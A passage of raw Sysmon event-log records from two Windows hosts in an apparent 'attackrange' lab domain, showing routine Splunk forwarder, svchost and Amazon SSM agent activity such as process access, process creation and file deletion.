Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000982254Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:28.960{69CF5F33-8EBC-6151-3C7A-00000000FD01}3128C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000982253Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:25.876{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59595-false10.0.1.12-8000- 10341000x8000000000000000982252Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:28.287{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8EBC-6151-3B7A-00000000FD01}1192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982251Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:28.287{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982250Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:28.287{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982249Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:28.287{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982248Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:28.287{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982247Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:28.287{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982246Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:28.287{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982245Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:28.287{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982244Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:28.287{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982243Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:28.287{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982242Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:28.287{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8EBC-6151-3B7A-00000000FD01}1192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000982241Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:28.287{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8EBC-6151-3B7A-00000000FD01}1192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000982240Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:28.276{69CF5F33-8EBC-6151-3B7A-00000000FD01}1192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000982239Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:28.272{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C81DEDA684135BECB726F7B0C5A0658,SHA256=01C23EA20DF88F371B1FC143F55A385FFFDCA3B98B2A329A4CE9A7915F33675D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982238Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:28.228{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\respondent-20210924073259-4324MD5=C03F5A35DCD33CC76F546E3EA7D3F3DF,SHA256=27CB325E5A2A8D6C4E4022C2FAED9138BDF4BFE7B38BDA6EB79267B7EDAE26D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982237Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:28.100{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1D703A329B4DB4AA21ADC1793E96EF59,SHA256=A3F73F9FF81C5A6EB4224F02C8A64132E0FBB5D3141D08F25D1BF0A3C48E16FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982270Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:29.411{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69A2B51D64EB2A995696CC44C2D92740,SHA256=C627DE74E357A32068B1CDC1ACDCB6BC6E6DCA13BC956A61C38664AFE857A5C9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057900Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:29.615{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8EBD-6151-DB00-00000000FD01}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057899Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:29.613{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057898Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:29.613{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057897Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:29.612{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057896Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:29.612{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057895Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:29.612{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8EBD-6151-DB00-00000000FD01}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001057894Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:29.612{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8EBD-6151-DB00-00000000FD01}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001057893Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:29.612{5EBD8912-8EBD-6151-DB00-00000000FD01}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001057892Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:29.501{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3362750A2437BB2403CAAFEB771317A1,SHA256=C5853C76B191CD5FC2E0F42C66AA0E77BAF9B42F53ECF86A0E638385120503C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057891Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:29.497{5EBD8912-8CD0-6151-2F00-00000000FD01}2544NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\respondent-20210927092018-007MD5=418358CD28D1B50422280074BE968B1D,SHA256=C8286C1C0A91E4E2C2FF9D12E0FDD08F235EAD61265C1678C815B6AB5A1254BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982269Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:29.286{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=08C94DA14BC09313F9D062934C604ECD,SHA256=3B58BB8E9BEF569E7689B8D09919F39F7390DEA4AEADECB5B75F3E5B2BCA65EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982268Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:29.242{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program 